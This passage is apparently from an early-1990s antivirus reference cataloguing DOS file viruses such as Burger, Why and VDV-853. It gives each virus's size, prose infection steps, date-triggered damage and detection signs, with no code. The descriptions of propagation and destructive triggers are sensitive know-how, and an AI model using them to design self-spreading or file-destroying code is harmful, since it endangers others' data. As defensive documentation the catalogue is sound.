  1777. 1) Searches for an .EXE file in the current directory and the "A:"
  1778.     drive.
  1779. 2) It then checks whether it has been infected by PA-5792. If "Yes",
  1780.     it continues to look for any uninfected .EXE file.
  1781. 3) It only infects seven files at a time.
  1782. 4) It executes the originally called file.
  1783.  
  1784. Damage:  None
  1785.  
  1786. Detection Method: Infected files will increase by 5792 Bytes.
  1787.  
  1788. Note:
  1789. 1) Doesn't stay resident in memory.
  1790. 2) PA-5792 doesn't hook INT 24h when infecting files. Error message
  1791.     appears if there is an I/O error (such as write protect).
  1792.  
  1793. [Les]
  1794. Virus Name: Les
  1795. Virus Type: File Virus (infects .EXE files)
  1796. Virus Length: 358 Bytes
  1797. PC Vectors Hooked: None
  1798.  
  1799. Execution Procedure:
  1800. 1) Searches for an .EXE file in the current directory.
  1801. 2) It then checks to see whether it has been infected by the LES
  1802.     virus.  If "Yes", it continues to look for any uninfected
  1803.     .EXE file.
  1804. 3) It finally infects all .EXE files in the directory.
  1805.  
  1806. Damage:  None
  1807.  
  1808. Detection Method:  Infected files will increase by 358 Bytes.
  1809.  
  1810. Note:
  1811. 1) Doesn't stay resident in memory.
  1812. 2) LES doesn't hook INT 24h when infecting files. Error message
  1813.     appears if there is an I/O error (such as write protect).
  1814.  
  1815. [H & P]
  1816. Virus Name: H&P
  1817. Virus Type: File Virus (infects .COM files)
  1818. Virus Length: No change
  1819. PC Vectors Hooked: None
  1820.  
  1821. Execution Procedure:
  1822. 1) Searches for a COM file in the current directory.
  1823. 2) It then checks whether it has been infected by H&P. If "Yes",
  1824.     it continues to look for any uninfected .COM files.
  1825. 3) It only infects one file at a time.
  1826.  
  1827. Damage: Overwrites original file, so the length of infected file
  1828. won't increase.
  1829.  
  1830. Note:
  1831. 1) Doesn't stay resident in memory.
  1832. 2) H&P doesn't hook INT 24h when infecting files. Error message
  1833.     appears if there is an I/O error (such as write protect).
  1834.  
  1835. [OW]
  1836. Virus Name: Ow
  1837. Virus Type: File Virus (infects .COM files)
  1838. Virus Length: No change
  1839. PC Vectors Hooked: None
  1840.  
  1841. Execution Procedure:
  1842. 1) Searches for a COM file in the current directory.
  1843. 2) It then checks to see whether it has been already infected by OW.
  1844.     If "Yes", it continues to look for any uninfected .COM file.
  1845. 3) It finally infects all files in the directory.
  1846.  
  1847. Damage:  Overwrites original files, so the length of infected file
  1848. won't increase.
  1849.  
  1850. Note:
  1851. 1) Doesn't stay resident in memory.
  1852. 2) OW doesn't hook INT 24h when infecting files. Error message appears
  1853.     if there is an I/O error (such as write protect).
  1854.  
  1855. [Small115]
  1856. Virus Name: Small115
  1857. Virus Type: File Virus (infects .COM files)
  1858. Virus Length: 115 Bytes
  1859. PC Vectors Hooked: None
  1860.  
  1861. Execution Procedure:
  1862. 1) Searches for a .COM file in the current directory.
  1863. 2) It then checks whether it has been infected by Small115. If "Yes",
  1864.     it continues to look for any uninfected .COM file.
  1865. 3) It finally infects all the .COM files in the directory.
  1866.  
  1867. Damage:  Infected files won't be able to execute.
  1868.  
  1869. Detection Method:  Infected files will increase by 115 Bytes.
  1870.  
  1871. Note:
  1872. 1) Doesn't stay resident in memory.
  1873. 2) Small115 doesn't hook INT 24h when infecting files.  Error
  1874.     message appears if there is an I/O error of (such as write protect).
  1875.  
  1876. [Torm-263]
  1877. Virus Name: Torm-263
  1878. Virus Type: File Virus (infects .COM files)
  1879. Virus Length: 263 Bytes(COM)
  1880. PC Vectors Hooked: None
  1881.  
  1882. Execution Procedure:
  1883. 1) Searches for a .COM file in the current directory.
  1884. 2) It then checks whether it has been infected by TORM-263. If "Yes",
  1885.     it continues to look for any uninfected .COM files.
  1886. 3) It then infects all uninfected files in the directory.
  1887. 4) Finally, it executes the original file.
  1888.  
  1889. Damage:  None
  1890.  
  1891. Detection Method:  Infected files will increase by 263 Bytes.
  1892.  
  1893. Note:
  1894. 1) Doesn't stay resident in memory.
  1895. 2) TORM-263 doesn't  hook INT 24h when infecting files. Error
  1896.     message appears if there is an I/O error (such as write protect).
  1897.  
  1898. [Radyum]
  1899. Virus Name: Radyum
  1900. Virus Type: File Virus (infects .COM files)
  1901. Virus Length: 448 Bytes(COM)
  1902. PC Vectors Hooked: None
  1903.  
  1904. Execution Procedure:
  1905. 1) Searches for a .COM file in the current directory.
  1906. 2) It checks whether it has been infected by Radyum. If "Yes", it
  1907.     continues to look for any uninfected .COM files.
  1908. 3) It only infects one file at a time.
  1909. 4) Finally it executes the original file.
  1910.  
  1911. Damage:  None
  1912.  
  1913. Detection Method: Infected files will increase by 448 Bytes.
  1914.  
  1915. Note:
  1916. 1) Doesn't stay resident in memory.
  1917. 2) Radyum doesn't hook INT 24h when infecting files. Error message
  1918.     appears if there is an I/O error (such as write protect).
  1919.  
  1920. [Psycho]
  1921. Virus Name: Psycho
  1922. Virus Type: File Virus (infects .EXE and .COM files)
  1923. Virus Length: No change
  1924. PC Vectors Hooked: None
  1925.  
  1926. Execution Procedure:
  1927. 1) Searches for a .COM or .EXE file in the current directory.
  1928. 2) It checks whether the file has been infected by Psycho. If "Yes",
  1929.     it continues to search for an uninfected .COM or .EXE file.
  1930. 3) It then infects all .EXE and .COM files in the directory.
  1931.  
  1932. Damage:  Overwrites original files, so the length of infected
  1933. files won't increase.
  1934.  
  1935. Note:
  1936. 1) Doesn't stay resident in memory.
  1937. 2) Psycho doesn't hook INT 24h when infecting files. Error message
  1938.     appears if there is an I/O error (such as write protect).
  1939.  
  1940. [VCL9]
  1941. Virus Name: Vcl9
  1942. Virus Type: File Virus (infects .EXE and .COM files)
  1943. Virus Length: No change
  1944. PC Vectors Hooked: None
  1945.  
  1946. Execution Procedure:
  1947. 1) Searches for .COM or .EXE files in the current directory.
  1948. 2) It checks  whether the first file found has been infected by VCL9.
  1949.     If "Yes", it continues to look for any uninfected .COM or .EXE
  1950.     file.
  1951. 3) It only infects two files at a time.
  1952.  
  1953. Damage:  Overwrites original files, so the length of infected files
  1954. won't increase.
  1955.  
  1956. Note:
  1957. 1) Doesn't stay resident in memory.
  1958. 2) VCL9 doesn't hook INT 24h when infecting files. Error message
  1959.     appears if there is an I/O error (such as write protect).
  1960.  
  1961. [Cheesy]
  1962. Virus Name: Cheesy
  1963. Virus Type: File Virus (infects .EXE files)
  1964. Virus Length: 381 Bytes(EXE)
  1965. PC Vectors Hooked: None
  1966.  
  1967. Execution Procedure:
  1968. 1) Searches for an .EXE file in the current directory.
  1969. 2) When it locates an .EXE file it checks whether it has been
  1970.     infected by CHEESY. If "Yes", it continues to look for an
  1971.     uninfected .EXE file.
  1972. 3) It then proceeds to infect all the .EXE files in the directory.
  1973. 4) Once a file is executed the system halts.
  1974.  
  1975. Damage:  System halts
  1976.  
  1977. Detection Method:  Infected files will increase by 381 Bytes.
  1978.  
  1979. Note:
  1980. 1) Doesn't stay resident in memory.
  1981. 2) CHEESY doesn't hook INT 24h when infecting files. Error message
  1982.     appears if there is an I/O error (such as write protect).
  1983.  
  1984. [Dutch]
  1985. Virus Name: Dutch
  1986. Virus Type: File Virus (infects .COM files)
  1987. Virus Length: 358 Bytes(COM)
  1988. PC Vectors Hooked: None
  1989.  
  1990. Execution Procedure:
  1991. 1) Searches for a .COM file in the current directory.
  1992. 2) When it locates a file it checks whether it has been infected by
  1993.     Dutch. If "Yes", it continues to look for any uninfected .COM
  1994.     file.
  1995. 3) It only infects one file at a time.
  1996.  
  1997. Damage:  None
  1998.  
  1999. Detection Method:  Infected files will increase by 358 Bytes.
  2000.  
  2001. Note:
  2002. 1) Doesn't stay resident in memory.
  2003. 2) Dutch doesn't hook INT 24h when infecting files.  Error message
  2004.     appears if there is an I/O error (such as write protect).
  2005.  
  2006. [Mini-2]
  2007. Virus Name: Mini-2
  2008. Virus Type: File Virus (infects .COM files)
  2009. Virus Length: No change
  2010. PC Vectors Hooked: None
  2011.  
  2012. Execution Procedure:
  2013. 1) Searches for a .COM file in the current directory.
  2014. 2) Once it locates the first .COM file it checks whether it has
  2015.     been infected by MINI-2.  If "Yes", it continues to look for
  2016.     any uninfected .COM files.
  2017. 3) It then infects all .COM files in the directory.
  2018.  
  2019. Damage:  Overwrites original files, so the length of infected files
  2020. won't increase.
  2021.  
  2022. Note:
  2023. 1) Doesn't stay resident in memory.
  2024. 2) MINI-2 doesn't hook INT 24h when infecting files. Error message
  2025.     appears if there is an I/O error (such as write protect).
  2026.  
  2027. [Define-1]
  2028. Virus Name: Define-1
  2029. Virus Type: File Virus (infects .EXE and .COM files)
  2030. Virus Length: No change
  2031. PC Vectors Hooked: None
  2032.  
  2033. Execution Procedure:
  2034. 1) Searches for an .EXE or .COM file in the current directory.
  2035. 2) Once it locates a file it checks whether it has been infected
  2036.     by Define-1. If "Yes", it continues to look for another
  2037.     uninfected .COM or .EXE file.
  2038. 3) It only infects one file at a time.
  2039.  
  2040. Damage:  Overwrites original file, so the length of infected file
  2041. won't increase.
  2042.  
  2043. Note:
  2044. 1) Doesn't stay resident in memory.
  2045. 2) Define-1 doesn't  hook INT 24h when infecting files. Error
  2046.     message appears if there is an I/O error (such as write protect).
  2047.  
  2048. [205]
  2049. Virus Name: 205
  2050. Virus Type: File Virus (infects .COM files)
  2051. Virus Length: 205 Bytes(COM)
  2052. PC Vectors Hooked: None
  2053.  
  2054. Execution Procedure:
  2055. 1) Searches for a .COM file in the current directory.
  2056. 2) When it locates a .COM file it checks if the file has been
  2057.     previously infected by 205. If "Yes", it continues to look for
  2058.     an uninfected .COM file.
  2059. 3) It then proceeds to infect all the .COM files in the directory.
  2060. 4) Finally it executes the originally called file.
  2061.  
  2062. Damage:  None
  2063.  
  2064. Detection Method:  Infected files will increase by 205 Bytes.
  2065.  
  2066. Note:
  2067. 1) Doesn't stay resident in memory.
  2068. 2) 205 doesn't hook INT 24h when infecting files. Error message
  2069.     appears if there is an I/O error (such as write protect).
  2070.  
  2071. [Banana]
  2072. Virus Name: Banana
  2073. Virus Type: File Virus (infects .COM files)
  2074. Virus Length: No change
  2075. PC Vectors Hooked: None
  2076.  
  2077. Execution Procedure:
  2078. 1) Searches for a .COM file in the current directory.
  2079. 2) When it locates a .COM file it checks whether or not it has been
  2080.     infected by Banana. If "Yes", it continues to search for another
  2081.     uninfected .COM file.
  2082. 3) It then proceeds to infect all .COM files in the directory.
  2083.  
  2084. Damage:  Overwrites original file, so the length of infected file
  2085. won't increase.
  2086.  
  2087. Note:
  2088. 1) Doesn't stay resident in memory.
  2089. 2) Banana doesn't hook INT 24h when infecting files. Error message
  2090.     appears if there is an I/O error (such  as write protect).
  2091.  
  2092. [334]
  2093. Virus Name: 334
  2094. Virus Type: File Virus (infects .COM files)
  2095. Virus Length: 334 Bytes(COM)
  2096. PC Vectors Hooked: None
  2097.  
  2098. Execution Procedure:
  2099. 1) Searches for a .COM file in the current directory.
  2100. 2) Once it locates a .COM file it checks whether it has been
  2101.     infected by 334. If "Yes", it continues to search for an
  2102.     uninfected .COM file.
  2103. 3) It infects uninfected files one at a time.
  2104. 4) Finally it executes the original file.
  2105.  
  2106. Damage:  None
  2107.  
  2108. Detection Method: Infected files will increase by 334 Bytes.
  2109.  
  2110. Note:
  2111. 1) Doesn't stay resident in memory.
  2112. 2) 334 doesn't hook INT 24h when infecting files. Error message
  2113.     appears if there is an I/O error (such as write protect).
  2114.  
  2115. [Redx-1]
  2116. Virus Name: Redx-1
  2117. Virus Type: File Virus (infects .COM files)
  2118. Virus Length: 796 Bytes
  2119. PC Vectors Hooked: None
  2120.  
  2121. Execution Procedure:
  2122. 1) Searches for a .COM file in the C:\ root directory.
  2123. 2) Once it locates a .COM  file it checks whether it has been infected
  2124.     by REDX-1. If "Yes", it continues searching for an uninfected .COM
  2125.     file.
  2126. 3) It then infects other .COM files two at a time.
  2127. 4) It finally executes the original file.
  2128.  
  2129. Damage:  None
  2130.  
  2131. Detection Method:  Infected files will increase by 796 Bytes.
  2132.  
  2133. Note:
  2134. 1) Doesn't stay resident in memory.
  2135. 2) REDX-1 doesn't hook INT 24h when infecting files. Error message
  2136.     appears if there is an I/O error (such as  write protect).
  2137.  
  2138. [Dismember]
  2139. Virus Name: Dismember
  2140. Virus Type: File Virus (infects .COM files)
  2141. Virus Length: 288 Bytes(COM)
  2142. PC Vectors Hooked: None
  2143.  
  2144. Execution Procedure:
  2145. 1) Searches  for a .COM file in the current directory.
  2146. 2) Once it locates a .COM  file it checks whether it has been infected
  2147.     by Dismember. If "Yes", it continues to search for an uninfected
  2148.     .COM file.
  2149. 3) It then infects all .COM files in the directory.
  2150. 4) Finally, it executes the originally called file.
  2151.  
  2152. Damage:  None
  2153.  
  2154. Detection Method:  Infected files will increase by 288 Bytes.
  2155.  
  2156. Note:
  2157. 1) Doesn't stay resident in memory.
  2158. 2) Dismember doesn't hook INT 24h when infecting files. Error
  2159.     message appears if there is an I/O error (such as write protect).
  2160.  
  2161. [Timid]
  2162. Virus Name: Timid
  2163. Virus Type: File Virus (infects .COM files)
  2164. Virus Length: 306 Bytes (COM)
  2165. PC Vectors Hooked: None
  2166.  
  2167. Execution Procedure:
  2168. 1) Searches for a .COM file in the current directory.
  2169. 2) Once it locates a file it checks whether it has been infected by
  2170.     Timid. If "Yes", it continues to search for an uninfected
  2171.     .COM file.
  2172. 3) It then infects one file at a time and displays the infected file
  2173.     name on the screen.
  2174. 4) Once the file is executed the system will halt.
  2175.  
  2176. Damage:  Damages original file.
  2177.  
  2178. Detection Method:
  2179. 1) Infected files will increase by 306 Bytes.
  2180. 2) Other file names are shown on the screen.
  2181.  
  2182. Note:
  2183. 1) Doesn't stay resident in memory.
  2184. 2) Timid doesn't hook INT 24h when infecting files.  Error message
  2185.     appears if there is an I/O error (such as write protect).
  2186.  
  2187. [Druid]
  2188. Virus Name: Druid
  2189. Virus Type: File Virus (infects .COM files)
  2190. Virus Length: No change
  2191. PC Vectors Hooked: None
  2192.  
  2193. Execution Procedure:
  2194. 1) Searches for a COM file in the current  directory.
  2195. 2) Once it locates a file it checks whether it has been infected by
  2196.     Druid. If "Yes", it continues to search  for any uninfected
  2197.     .COM file.
  2198. 3) It then infects all .COM files in the directory.
  2199.  
  2200. Damage:  Overwrites original file, so the length of infected file
  2201. won't increase.
  2202.  
  2203. Note:
  2204. 1) Doesn't stay resident in memory.
  2205. 2) Druid doesn't hook INT 24h when infecting files.  Error message
  2206.     appears if there is an I/O error (such as write protect).
  2207.  
  2208. [Itti-B]
  2209. Virus Name: Itti-B
  2210. Virus Type: File Virus (infects .COM files)
  2211. Virus Length: No change
  2212. PC Vectors Hooked: None
  2213.  
  2214. Execution Procedure:
  2215. 1) Searches for a .COM file in the current directory.
  2216. 2) Once it locates a file it checks whether it has been infected by
  2217.     ITTI-B. If "Yes", it continues to look for any  uninfected
  2218.     .COM file.
  2219. 3) It will only infect one file at a time.
  2220. 4) It finally damages all the data on current disk if none of the
  2221.     .COM files are infected.
  2222.  
  2223. Damage:
  2224. 1) Overwrites original file, so the length of infected  file won't
  2225.     increase.
  2226. 2) Damages all data on current disk if none of the .COM files are
  2227.     infected.
  2228.  
  2229. Note:
  2230. 1) Doesn't stay resident in memory.
  2231. 2) ITTI-B doesn't hook INT 24h when infecting files. Error message
  2232.     appears if there is an I/O error (such as  write protect).
  2233.  
  2234. [Itti-A]
  2235. Virus Name: Itti-A
  2236. Virus Type: File Virus (infects .COM files)
  2237. Virus Length: No change
  2238. PC Vectors Hooked: None
  2239.  
  2240. Execution Procedure:
  2241. 1) Searches for a .COM file in the current directory.
  2242. 2) Once it locates a .COM file it checks whether it has been infected
  2243.     by ITTI-A. If "Yes", it continues to look for any  uninfected
  2244.     .COM file.
  2245. 3) It infects only one file at a time. Then when the file is executed
  2246.     the message "EXEC FAILURE" will show on the screen.
  2247. 4) It will finally damage all data on current disk if no .COM file
  2248.     is infected.
  2249.  
  2250. Damage:
  2251. 1) Overwrites original file, so the length of infected  file won't
  2252.     increase.
  2253. 2) Damages all data on current disk if no .COM file is infected.
  2254.  
  2255. Note:
  2256. 1) Doesn't stay resident in memory.
  2257. 2) ITTI-A doesn't hook INT 24h when infecting files. Error message
  2258.     appears if there is an I/O error (such as write protect).
  2259.  
  2260. [Burger]
  2261. Virus Name: Burger
  2262. Virus Type: File Virus (infects .COM files)
  2263. Virus Length: No change
  2264. PC Vectors Hooked: None
  2265.  
  2266. Execution Procedure:
  2267. 1) Searches for a COM file in the current directory.
  2268. 2) Checks whether it has been infected by Burger. If "Yes", it
  2269.     continues to look for an uninfected COM file.
  2270. 3) Infects only one file at a time.
  2271. 4) Damages all data on current disk if no .COM file is infected.
  2272.  
  2273. Damage:
  2274. 1) Overwrites original file, so the length of infected file won't
  2275.     increase.
  2276. 2) Damages all data on current disk if no .COM file is infected.
  2277.  
  2278. Note:
  2279. 1) Doesn't stay resident in memory.
  2280. 2) Burger doesn't hook INT 24h when infecting files. Error message
  2281.     appears if there is an I/O error (such as writing protect).
  2282.  
  2283. [Bloodlust]
  2284. Virus Name: Bloodlust
  2285. Virus Type: File Virus (infects .COM files)
  2286. Virus Length: No change
  2287. PC Vectors Hooked: None
  2288.  
  2289. Execution Procedure:
  2290. 1) Searches for a *.C* file in the current directory.
  2291. 2) Once it locates a file it checks whether it has been infected by
  2292.     Bloodlust. If "Yes", it continues to look for any uninfected
  2293.     *.C* file.
  2294. 3) Once it locates an uninfected *.C* file it will infect it and
  2295.     will continue doing this until all *.C* files are infected.
  2296.  
  2297. Damage: Overwrites original file, so the length of infected file
  2298. won't increase.
  2299.  
  2300. Note:
  2301. 1) Doesn't stay resident in memory.
  2302. 2) Bloodlust doesn't hook INT 24h when infecting files. Error message
  2303.     appears if there is an I/O error (such as write protect).
  2304.  
  2305. [ZY]
  2306. Virus Name: Zy
  2307. Virus Type: File Virus (infects .COM files)
  2308. Virus Length: 463 Bytes(COM)
  2309. PC Vectors Hooked: None
  2310.  
  2311. Execution Procedure:
  2312. 1) Searches for a .COM file in the current directory.
  2313. 2) Once it locates a file it checks whether it has been infected by
  2314.     ZY. If "Yes", it continues to look for any  uninfected .COM file.
  2315. 3) It only infects one file at a time.
  2316. 4) It finally executes the originally called file.
  2317.  
  2318. Damage:  None
  2319.  
  2320. Detection Method: Infected files will increase by 463 Bytes.
  2321.  
  2322. Note:
  2323. 1) Doesn't stay resident in memory.
  2324. 2) ZY doesn't hook INT 24h when infecting files. Error message appears
  2325.     if there is an I/O error (such as write protect).
  2326.  
  2327. [Kode4-2]
  2328. Virus Name: Kode4-2
  2329. Virus Type: File Virus (infects .COM files)
  2330. Virus Length: About 3000 Bytes (COM)
  2331. PC Vectors Hooked: None
  2332.  
  2333. Execution Procedure:
  2334. 1) Searches for a *.C* file in the current directory.
  2335. 2) Infects all the *.C* files in the directory.
  2336. 3) Then the following screen message will appear: "-=+ Kode4 +=-, The
  2337.     one and ONLY!"
  2338.  
  2339. Damage:  Overwrites original files.
  2340.  
  2341. Detection Method: Check for the message, "-=+ Kode4 +=- The one and
  2342. ONLY!" on the screen.
  2343.  
  2344. Note:
  2345. 1) Doesn't stay resident in memory.
  2346. 2) Kode4-2 doesn't hook INT 24h when infecting files. Error message
  2347.     appears if there is an I/O error (such as write protect).
  2348.  
  2349. [Mini-212]
  2350. Virus Name: Mini-212
  2351. Virus Type: File Virus (infects .COM files)
  2352. Virus Length: 212 or 300 Bytes(COM)
  2353. PC Vectors Hooked: None
  2354.  
  2355. Execution Procedure:
  2356. 1) Searches for a .COM file in the current directory beginning with
  2357.     files starting with the letter "A" and randomly selecting files
  2358.     through the letter "Z".
  2359. 2) It then checks the file whether it has been infected by MINI-212.
  2360.     If "Yes", it continues to look for an uninfected .COM file.
  2361. 3) It only infects one file at a time.
  2362.  
  2363. Damage:  None
  2364.  
  2365. Detection Method: Infected files will increase by 212 or 300 bytes.
  2366.  
  2367. Note:
  2368. 1) Doesn't stay resident in memory.
  2369. 2) MINI-212 doesn't hook INT 24h when infecting files. Error message
  2370.     appears if there is an I/O error (such as write protect).
  2371.  
  2372. [Anna]
  2373. Virus Name: Anna
  2374. Virus Type: File Virus (infects .COM files)
  2375. Virus Length: 742 Bytes(COM)
  2376. PC Vectors Hooked: None
  2377.  
  2378. Execution Procedure:
  2379. 1) Searches for a .COM file in the current directory.
  2380. 2) Once it locates a file it checks whether it has been infected by
  2381.     ANNA. If "Yes", it continues to look for any  uninfected .COM
  2382.     file.
  2383. 3) It will only infect one file at a time.
  2384. 4) If no uninfected file is found in the current directory, it will
  2385.     continue to look for an uninfected file in another directory.
  2386. 5) It will then check the system date. If it is December, then this
  2387.     message will appear on the screen: "Yole from the ARcV........."
  2388.  
  2389. Damage:  None
  2390.  
  2391. Detection Method:
  2392. 1) Infected files will increase by 742 Bytes.
  2393. 2) If it is December the following message will appear on the screen:
  2394.     "Yole from the ARcV.......".
  2395.  
  2396. Note:
  2397. 1) Doesn't stay resident in memory.
  2398. 2) ANNA doesn't hook INT 24h when infecting files. Error message
  2399.     appears if there is an I/O error (such as writing protect).
  2400.  
  2401. [Grunt2]
  2402. Virus Name: Grunt2
  2403. Virus Type: File Virus (infects .COM files)
  2404. Virus Length: 427 Bytes(COM)
  2405. PC Vectors Hooked: None
  2406.  
  2407. Execution Procedure:
  2408. 1) Searches for a .COM file in the current directory.
  2409. 2) Once it locates a file it checks whether it has been infected by
  2410.     GRUNT2. If "Yes", it continues to look for any  uninfected .COM
  2411.     file.
  2412. 3) It will infect only one file at a time.
  2413. 4) It then checks the system date. If the date is the 3rd of September
  2414.     and year is larger than 1993, it will delete a file on the current
  2415.     disk and then show the screen message: "S[GRUNT-2] -=> Agent Orange
  2416.     '92 <=-       Rock of the Marne Sir!.......".
  2417.  
  2418. Damage: If system date is 3rd of September and year is larger than
  2419. 1993, the virus will delete a file on the current disk.
  2420.  
  2421. Detection Method: Infected files will increase by 427 Bytes.
  2422.  
  2423. Note:
  2424. 1) Doesn't stay resident in memory.
  2425. 2) GRUNT2 doesn't hook INT 24h when infecting files. Error message
  2426.     appears if there is an I/O error (such as a write protect).
  2427.  
  2428. [VDV-853]
  2429. Virus Name: Vdv-853
  2430. Virus Type: File Virus (infects .COM files)
  2431. Virus Length: 853 Bytes(COM)
  2432. PC Vectors Hooked: None
  2433.  
  2434. Execution Procedure:
  2435. 1) Checks whether the system date is between the 24th and 26th of
  2436.     December. If "yes", the virus will delete all files in the
  2437.     current directory, then will create a file with 273 bytes and
  2438.     show the message: "Frhliche Weihnachten wnscht der Verband
  2439.     Deutscher Virenliebhaber Ach ja, und dann wnschen wir auch noch
  2440.     viel Spab beim Suchen nach den Daten von der Festplatte! Hello -
  2441.     Copyright S&S International, 1990".
  2442. 2) If "no", then it will search for a .COM file in the current
  2443.     directory.  b) Once it locates a file it checks whether it has
  2444.     been infected by VDV-853. If "Yes", it continues to look for an
  2445.     uninfected .COM file. c) It will only infect four files at a
  2446.     time.
  2447.  
  2448. Damage: If the system date is between the 24th and 26th of December,
  2449. the virus will delete all files in the current directory.
  2450.  
  2451. Detection Method: Infected files will increase by 853 Bytes.
  2452.  
  2453. Note:
  2454. 1) Doesn't stay resident in memory.
  2455. 2) VDV-853 don't hook INT 24h when infecting files. Error message
  2456.     appears if there is an error of I/O (such as a write protect).
  2457. 3) Virus pattern is the same as "SON_OF_VSC_2".
  2458.  
  2459. [Wild Thing]
  2460. Virus Name: Wild-Thing
  2461. Virus Type: File Virus (infects .COM files)
  2462. Virus Length: 567 Bytes(COM)
  2463. PC Vectors Hooked: None
  2464.  
  2465. Execution Procedure:
  2466. 1) Checks whether the system date is Friday. If "yes", a message
  2467.     appears on the screen: " It's Friday ........ Enjoy the weekend
  2468.     with your computer![YAM '92]." Then the system halts.
  2469. 2) If "no", then it will search for a .COM file in the current
  2470.     directory.  Once it locates a file it checks whether it has been
  2471.     infected by Wild-Thing. If "Yes", it continues to look for
  2472.     another uninfected .COM file.
  2473. 3) It will infect all files in the current and the "mother" directories
  2474.     until all .COM files become infected.
  2475. 4) Then it will execute the original file.
  2476.  
  2477. Damage: If the system date is Friday, this message appears: "It's
  2478. Friday ....... Enjoy the weekend with your computer![YAM '92]."
  2479. Then the system halts.
  2480.  
  2481. Detection Method: Infected files will increase by 567 bytes.
  2482.  
  2483. Note:
  2484. 1) Doesn't stay resident in memory.
  2485. 2) Wild-Thing doesn't hook INT 24h when infecting files. Error
  2486.     message appears if there is an I/O error (such as a write
  2487.     protect).
  2488.  
  2489. [Arcv-Fri]
  2490. Virus Name: Arcv-Fri
  2491. Virus Type: File Virus (infects .COM files)
  2492. Virus Length: 839 Bytes(COM)
  2493. PC Vectors Hooked: None
  2494.  
  2495. Execution Procedure:
  2496. 1) Checks whether the system date is April 12; if "Yes", it searches
  2497.     for a .COM file in the current directory, then damages it.
  2498. 2) If "No", then it searches for a .COM file in the current directory.
  2499. 3) It checks whether it has been infected by ARCV-FRI. If "Yes", it
  2500.     continues to look for any uninfected .COM file.
  2501. 4) It only infects one file at a time.
  2502. 5) It then executes the original file.
  2503.  
  2504. Damage: If the system date is April 12, it searches for a .COM file
  2505. in the current directory, then damages it.
  2506.  
  2507. Detection Method: Infected files will increase by 839 Bytes.
  2508.  
  2509. Note:
  2510. 1) Doesn't stay resident in memory.
  2511. 2) ARCV-FRI doesn't hook INT 24h when infecting files. Error message
  2512.     appears if there is an I/O error (such as write protect).
  2513.  
  2514. [Agent-B]
  2515. Virus Name: Agent-B
  2516. Virus Type: File Virus (infects .EXE and .COM files)
  2517. Virus Length: 763 Bytes(COM & EXE)
  2518. PC Vectors Hooked: INT 24h
  2519.  
  2520. Execution Procedure:
  2521. 1) Searches for a .COM file in the current directory.
  2522. 2) Once it locates a file it checks whether it has been infected by
  2523.     Argent. If "Yes", it continues to look for any  uninfected .COM
  2524.     file.
  2525. 3) It will infect only two files at a time.
  2526.  
  2527. Damage:  None
  2528.  
  2529. Detection Method: Infected files will increase by 763 bytes.
  2530.  
  2531. Note:
  2532. 1) Doesn't stay resident in memory.
  2533. 2) Argent hooks INT 24h when infecting files. Omits I/O error
  2534.     (such as write protect).
  2535.  
  2536. [Nanite]
  2537. Virus Name: Nanite
  2538. Virus Type: File Virus (infects .EXE and .COM files)
  2539. Virus Length: No change
  2540. PC Vectors Hooked: None
  2541.  
  2542. Execution Procedure:
  2543. 1) Searches for a .COM or .EXE file in the current directory.
  2544. 2) Once it locates a file it checks whether it has been infected by
  2545.     Nanite. If "Yes", it continues to look for any  uninfected .COM
  2546.     or .EXE file.
  2547. 3) It will infect all .EXE and .COM files until all files in the
  2548.     current directory have been infected
  2549.  
  2550. Damage: Overwrites the original files, so the length of infected
  2551. files won't increase.
  2552.  
  2553. Note:
  2554. 1) Doesn't stay resident in memory.
  2555. 2) Nanite doesn't hook INT 24h when infecting files. Error message
  2556.     appears if there is an I/O error (such as  write protect).
  2557.  
  2558. [Arcv-670]
  2559. Virus Name: Arcv-670
  2560. Virus Type: File Virus (infects .COM files)
  2561. Virus Length: 670 Bytes(COM)
  2562. PC Vectors Hooked: None
  2563.  
  2564. Execution Procedure:
  2565. 1) Searches for a .COM file in the current directory.
  2566. 2) Once it locates a file it checks whether it has been infected
  2567.     by ARCV-670. If "Yes", it continues to look for any  uninfected
  2568.     .COM file.
  2569. 3) It will infect only one file at a time.
  2570. 4) It finally checks the system date. If the date is between the
  2571.     20th and 25th of December, and the year is larger than 1992,
  2572.     it will show the message: "Happy Xmas from the ARCV", then the
  2573.     system halts.
  2574.  
  2575. Damage: If the system date is between the 20th and 25th of December
  2576. and the year is larger than 1992, this message appears: "Happy Xmas
  2577. from the ARCV", then the system halts.
  2578.  
  2579. Detection Method: Infected files will increase by 670 Bytes.
  2580.  
  2581. Note:
  2582. 1) Doesn't stay resident in memory.
  2583. 2) ARCV-670 doesn't  hook INT 24h when infecting files. Error
  2584.     message appears  if there is an I/O error  (such as write
  2585.     protect).
  2586.  
  2587. [Why]
  2588. Virus Name: Why
  2589. Virus Type: File Virus (infects .COM files)
  2590. Virus Length: 457 Bytes(COM)
  2591. PC Vectors Hooked: None
  2592.  
  2593. Execution Procedure:
  2594. 1) Searches for a .COM file in the current directory.
  2595. 2) Once it locates a file it checks whether it has been infected
  2596.     by Why. If "Yes", it continues to look for any uninfected .COM
  2597.     file.
  2598. 3) It will only infect one file at a time.
  2599. 4) It then checks the system date. If the date is the 12th of May
  2600.     or the 25th of February, the virus will damage all files on
  2601.     the hard disk.
  2602.  
  2603. Damage:  If the system date is May 12 or February 25, the virus
  2604. will damage all files on the hard disk.
  2605.  
  2606. Detection Method: Infected files will increase by 457 Bytes.
  2607.  
  2608. Note:
  2609. 1) Doesn't stay resident in memory.
  2610. 2) "Why" doesn't hook INT 24h when infecting files.  Error message
  2611.     appears if there is an I/O error (such as write protect).
  2612.  
  2613. [FCB]
  2614. Virus Name: Fcb
  2615. Virus Type: File Virus (infects .EXE and .COM files)
  2616. Virus Length: No change
  2617. PC Vectors Hooked: None
  2618.  
  2619. Execution Procedure:
  2620. 1) Searches for a .COM file in the current directory.
  2621. 2) Once it locates a file it checks whether it has been infected
  2622.     by FCB. If "Yes", it continues to look for any  uninfected
  2623.     .COM file.
  2624. 3) It will only infect one file at a time.
  2625. 4) Searches for an .EXE file in the current directory.
  2626. 5) Once it locates a file it checks whether it has been infected
  2627.     by FCB. If "Yes", it continues to look for any uninfected .EXE
  2628.     file.
  2629. 6) It will only infect one file at a time.
  2630.  
  2631. Damage: Overwrites the original file, so the length of the infected
  2632. file won't increase.
  2633.  
  2634. Note:
  2635. 1) Doesn't stay resident in memory.
  2636. 2) FCB doesn't hook  INT 24h when infecting files. Error message
  2637.     appears if there is an I/O error (such as write protect).
  2638.  
  2639. [Casper]
  2640. Virus Name: Casper
  2641. Virus Type: File Virus (infects .COM files)
  2642. Virus Length: 1200 Bytes(COM)
